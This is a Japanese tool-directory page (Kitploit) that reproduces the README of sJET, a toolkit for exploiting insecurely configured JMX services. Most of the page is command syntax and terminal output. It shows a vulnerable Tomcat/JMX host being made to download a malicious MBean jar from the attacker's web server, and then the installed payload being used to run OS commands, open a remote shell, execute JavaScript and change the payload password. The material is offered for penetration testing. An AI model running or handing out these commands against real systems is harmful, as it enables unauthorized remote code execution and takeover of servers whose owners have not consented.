Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
sjet — siberas JMX エクスプロイトツールキット | Kitploit
ツール/GitHubGitHub/siberas/sjet
ペイロード生成エクスプロイトコマンド&コントロールリモートアクセスツール
GitHubsiberas/sjet

sjet

siberas JMX エクスプロイトツールキット

リポジトリを見る
133915年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

sJET(siberas 製)

siberas JMX エクスプロイテーションツールキット

sJET は、安全でない設定の JMX サービスを簡単に悪用できるようにします。追加の背景情報は、こちら および こちら にあります。

前提条件

  • Jython 2.7

使用方法

SJET は CLI インターフェースを実装しています(argparse を使用)。

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

ここで

  • targetHost - ターゲット IP アドレス
  • targetPort - JMX が動作しているターゲットポート
  • password - インストール時に設定されたパスワード
  • MODE - スクリプトモード
  • modeOptions - 選択したモードのオプション

モードと modeOptions

  • install - 現在のターゲットにペイロードをインストールします
    • payload_url - ペイロードをロードする完全な URL
    • payload_port - ペイロードをロードするポート
  • uninstall - 現在のターゲットからペイロードをアンインストールします
  • password - デプロイ済みのペイロードのパスワードを変更します
    • password - 新しいパスワード
  • command - ターゲットホストでコマンド CMD を実行します
    • CMD - 実行するコマンド
  • shell - ターゲットホストでシンプルなシェルを起動します(Java の Runtime.exec() の制限があります)
  • javascript - ターゲットホストで JavaScript ファイル FILENAME を実行します
    • FILENAME - 実行する JavaScript

例

脆弱な JMX サービスへのペイロード MBean のインストール

次の例では、脆弱な JMX サービスが 192.168.11.136:9991 で動作しており、攻撃者は IP アドレス 192.168.11.132 を持っています。JMX サービスは攻撃者の Web サービスに接続してペイロード jar ファイルをダウンロードします。sJET はポート 8000 で必要な Web サービスを起動します。

MBean のインストールが成功すると、デフォルトのパスワードはコマンドラインで指定されたパスワード("super_secret")に変更されます。

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanSiberas:name=payload,id=1
[+] Changing default password...
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

h0ng10@rocksteady:~/sjet$

Linux ターゲットでのコマンド 'ls -la' の実行

ペイロードがインストールされた後、これを使用してターゲット上で OS コマンドを実行できます。

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ls -la
total 16
drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady:~/sjet$

ターゲットでのシェルモードでの ping の実行

毎回 Java をロードしたくない場合は、「シェルモード」を使用して制限付きのコマンドシェルを取得できます。

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  3
[+] Use command 'exit_shell' to exit the shell
>>> ping -c 3 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2050ms
rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms


>>> exit_shell
[+] Done
h0ng10@rocksteady:~/sjet$

ターゲット上での JavaScript ペイロードの呼び出し

サンプルスクリプト「javaproperties.js」は、脆弱なサービスの Java プロパティを表示します。次のように呼び出すことができます。

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
java.vendor=Oracle Corporation
sun.java.launcher=SUN_STANDARD
catalina.base=/var/lib/tomcat8
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
...
java.vm.name=OpenJDK 64-Bit Server VM
file.encoding=UTF-8
java.specification.version=1.8


h0ng10@rocksteady:~/sjet$

パスワードの変更

既存のパスワード("super_secret")を "this-is-the-new-password" に変更します:

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  6
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

[+] Done
h0ng10@rocksteady:~/sjet$

ターゲットからのペイロード MBean のアンインストール

ターゲットからペイロード 'Siberas' をアンインストールします:

root@kitploit:~
minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
[+] Connected: rmi://192.168.1.1  16
[+] MBean correctly uninstalled
minmaxer@prellermbp:~/sjet$

貢献

お気軽にコントリビュートしてください。

著者

  • Hans-Martin Münch - 初期のアイデアと作業 - h0ng10
  • Patricio Reller - CLI と追加オプション - preller

このプロジェクトに参加したコントリビューターのリストもご覧ください。

ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細については LICENSE ファイルを参照してください。

ツールをダウンロード